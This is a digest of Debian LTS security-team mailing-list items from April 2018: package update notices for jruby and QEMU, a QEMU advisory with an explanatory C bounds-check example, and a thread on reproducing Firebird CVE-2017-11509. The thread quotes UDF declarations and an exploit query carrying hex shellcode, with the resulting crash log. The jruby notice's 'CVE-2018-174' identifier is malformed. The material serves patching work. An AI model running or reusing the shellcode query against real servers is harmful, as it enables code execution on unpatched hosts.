Accepted jruby 1.5.6-5+deb7u2 (source all) into oldoldstable
Format: 1.8
Date: Tue, 17 Apr 2018 22:32:31 +0200
Source: jruby
Binary: jruby
Architecture: source all
Version: 1.5.6-5+deb7u2
Distribution: wheezy-security
Urgency: high
Maintainer: Debian Java Maintainers
Changed-By: Markus Koschany
Description:
 jruby      - 100% pure-Java implementation of Ruby
Changes:
 jruby (1.5.6-5+deb7u2) wheezy-security; urgency=high
 .
   * Non-maintainer upload by the LTS team.
   * Fix CVE-2018-174: possible Unsafe Object Deserialization Vulnerability
     in gem owner.
   * Build with OpenJDK 6 to avoid a FTBFS with Java 7.
Re: Wheezy update of firebird2.5?
-=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=-
> I don't quite know where to go from here. I was somewhat hoping that
> Wheezy would be magically not vulnerable to this issue, but obviously,
> there's something wrong here that should probably be fixed.

The only fix upstream has is to disable UDFs in firebird.conf --
https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
(probably needs adaptation for firebird2.5, but you get the idea).

-- dam
Re: Wheezy update of firebird2.5?
On 2018-04-04 19:54:14, Damyan Ivanov wrote:
> -=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
>> Dear maintainer(s),
>>
>> The Debian LTS team would like to fix the security issues which are
>> currently open in the Wheezy version of firebird2.5:
>> https://security-tracker.debian.org/tracker/source-package/firebird2.5
>>
>> Would you like to take care of this yourself?
>
> Sorry, no.
>
> AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the
> security team advised against updating that for stable, and the issue
> is still open in unstable.
>
> According to the researchers discovering it, upstream refused to fix
> it :( so the only "fix" I am aware of is the change in the default
> config to disable the vulnerable functionality. You can find the patch
> for firebird3.0 at
> https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698
>
> It is perhaps not directly applicable to firebird2.5, but should help
> regardless.

I tried digging into this issue a little further, and couldn't get far.
I always have this hurdle to just set up a test environment with
Firebird, so I figured I would share the procedure here for the future,
so that I wouldn't have to rebuild this from scratch every time.

1. install the database and packages:

   apt-get install firebird2.5-examples firebird2.5-dev firebird2.5-superclassic

2. set an admin password and configure the server:

   dpkg-reconfigure firebird2.5-superclassic

3. deploy a test database:

   gunzip -c /usr/share/doc/firebird2.5-examples/examples/empbuild/employee.fdb.gz > /var/lib/firebird/2.5/data/employee.fdb
   chown firebird.firebird /var/lib/firebird/2.5/data/employee.fdb

4. connect to the database, in an `isql-fb` prompt:

   SQL> connect "localhost:/var/lib/firebird/2.5/data/employee.fdb" user 'SYSDBA' password 'password';

Then you can do stuff like `SHOW TABLES` and so on.

In particular, I have tried to reproduce the issue and I can confirm I
can create two external functions with the same ENTRY_POINT, although
the second snippet in the advisory has two `DECLARE` statements which I
assume is a typo:

DECLARE EXTERNAL FUNCTION string2blob
  VARCHAR(300) BY DESCRIPTOR, BLOB
  RETURNS PARAMETER 2
  ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

DECLARE EXTERNAL FUNCTION a6
  VARCHAR(300) BY DESCRIPTOR, VARCHAR(400) BY DESCRIPTOR
  RETURNS INTEGER
  ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

The actual query to trigger arbitrary code execution seems to fail,
however:

SQL> select a6((select x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7' from rdb$database), (select x'C8FD8503' from rdb$database)) from rdb$database
Statement failed, SQLSTATE = 08006
Unable to complete network request to host "localhost".
-Error writing data to the connection.

Considering it was crafted to start `CALC.EXE` in Windows, that might be
expected. We do see a segfault in the logs however:

wheezy  Tue Apr 17 16:49:56 2018
        The user defined function:
                A6
         referencing entrypoint:
                string2blob
         in module:
                fbudf
        caused the fatal exception: Segmentation Fault. The code attempted to access memory without privilege to do so.
         This exception will cause the Firebird server to terminate abnormally.

... which is probably a bad sign.

I don't quite know where to go from here. I was somewhat hoping that
Wheezy would be magically not vulnerable to this issue, but obviously,
there's something wrong here that should probably be fixed.

A.

-- 
Every time I see an adult on a bicycle I no longer despair for the
future of the human race. - H. G. Wells
Re: ruby1.9.1 test packages for wheezy
Also, after talking with my old colleagues, I just realized that they
might be using Ruby 1.8 and not 1.9.1. It seems we have triaged those
out of the picture, but maybe all 1.8 packages are affected by a bunch
of those issues too?

This looks suspiciously sparse:

https://security-tracker.debian.org/tracker/source-package/ruby1.8

... when compared to the larger:

https://security-tracker.debian.org/tracker/source-package/ruby1.9.1

I feel it's quite possible we have forgotten a bunch of CVEs in Ruby
1.8, is it possible?

A.
[SECURITY] [DLA 1351-1] qemu security update
Package        : qemu
Version        : 1.1.2+dfsg-6+deb7u25
CVE ID         : CVE-2018-7550
Debian Bug     : 892041

The load_multiboot function in hw/i386/multiboot.c in Quick Emulator
(aka QEMU) allows local guest OS users to execute arbitrary code on the
QEMU host via a mh_load_end_addr value greater than mh_bss_end_addr,
which triggers an out-of-bounds read or write memory access.

For Debian 7 "Wheezy", these problems have been fixed in version
1.1.2+dfsg-6+deb7u25.

We recommend that you upgrade your qemu packages.

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
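To make the advisory's one-sentence description concrete, here is an added illustration (not QEMU's code and not the Debian patch) of how the copy length and destination size are derived from the header fields it names, beside a variant that validates their ordering first. The struct and function names are this example's own; only the mh_* field names come from the advisory.

```c
#include <stdbool.h>
#include <stdint.h>

/* Illustrative stand-in (not QEMU's code) for the Multiboot header fields
 * that load_multiboot() reads from an untrusted guest image. */
typedef struct {
    uint32_t mh_load_addr;     /* physical load address of the image        */
    uint32_t mh_load_end_addr; /* end of the bytes to copy (0: whole file)  */
    uint32_t mh_bss_end_addr;  /* end of bss: sizes the destination buffer  */
} mb_header;

/* Sizes derived straight from the header, as the vulnerable code did.
 * Unsigned subtraction silently wraps when the fields are out of order. */
static uint32_t mb_load_size(const mb_header *h, uint32_t file_size)
{
    return h->mh_load_end_addr ? h->mh_load_end_addr - h->mh_load_addr
                               : file_size;
}

static uint32_t mb_kernel_size(const mb_header *h, uint32_t load_size)
{
    return h->mh_bss_end_addr ? h->mh_bss_end_addr - h->mh_load_addr
                              : load_size;
}

/* CVE-2018-7550 in one predicate: with mh_load_end_addr > mh_bss_end_addr
 * the copy length exceeds the buffer, so the memcpy runs out of bounds. */
static bool mb_unchecked_overruns(mb_header h, uint32_t file_size)
{
    uint32_t ls = mb_load_size(&h, file_size);
    return mb_kernel_size(&h, ls) < ls;
}

/* Hardened variant: reject the header unless the fields that are set obey
 * load_addr <= load_end_addr <= bss_end_addr, the copy fits the image and
 * the buffer holds the copy. Only then are the sizes safe to use. */
static bool mb_header_valid(mb_header h, uint32_t file_size)
{
    if (h.mh_load_end_addr && h.mh_load_end_addr < h.mh_load_addr)
        return false;                               /* load size would wrap   */
    if (h.mh_bss_end_addr && h.mh_bss_end_addr < h.mh_load_addr)
        return false;                               /* kernel size would wrap */
    if (h.mh_bss_end_addr && h.mh_load_end_addr &&
        h.mh_bss_end_addr < h.mh_load_end_addr)
        return false;                               /* the advisory's case    */
    uint32_t ls = mb_load_size(&h, file_size);
    return ls <= file_size && mb_kernel_size(&h, ls) >= ls;
}
```

The first two checks catch the wrap-around cases that a plain "end greater than bss end" comparison would miss when the end field is below the load address.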
Accepted qemu 1.1.2+dfsg-6+deb7u25 (source all amd64) into oldoldstable
Format: 1.8
Date: Tue, 17 Apr 2018 09:30:00 -0400
Source: qemu
Binary: qemu qemu-keymaps qemu-system qemu-user qemu-user-static qemu-utils
Architecture: source all amd64
Version: 1.1.2+dfsg-6+deb7u25
Distribution: wheezy-security
Urgency: medium
Maintainer: Debian QEMU Team
Changed-By: Antoine Beaupré
Description:
 qemu       - fast processor emulator
 qemu-keymaps - QEMU keyboard maps
 qemu-system - QEMU full system emulation binaries
 qemu-user  - QEMU user mode emulation binaries
 qemu-user-static - QEMU user mode emulation binaries (static version)
 qemu-utils - QEMU utilities
Closes: 892041
Changes:
 qemu (1.1.2+dfsg-6+deb7u25) wheezy-security; urgency=medium
 .
   * Non-maintainer upload by the LTS Security Team.
   * CVE-2018-7550: fix host arbitrary code execution in multiboot
     (Closes: #892041)
Accepted qemu-kvm 1.1.2+dfsg-6+deb7u25 (source amd64) into oldoldstable
Format: 1.8
Date: Thu, 12 Apr 2018 13:12:27 -0400
Source: qemu-kvm
Binary: qemu-kvm qemu-kvm-dbg kvm
Architecture: source amd64
Version: 1.1.2+dfsg-6+deb7u25
Distribution: wheezy-security
Urgency: medium
Maintainer: Michael Tokarev
Changed-By: Antoine Beaupré
Description:
 kvm        - dummy transitional package from kvm to qemu-kvm
 qemu-kvm   - Full virtualization on x86 hardware
 qemu-kvm-dbg - Debugging info for qemu-kvm
Closes: 892041
Changes:
 qemu-kvm (1.1.2+dfsg-6+deb7u25) wheezy-security; urgency=medium
 .
   * Non-maintainer upload by the LTS Security Team.
   * CVE-2018-7550: fix host arbitrary code execution in multiboot
     (Closes: #892041)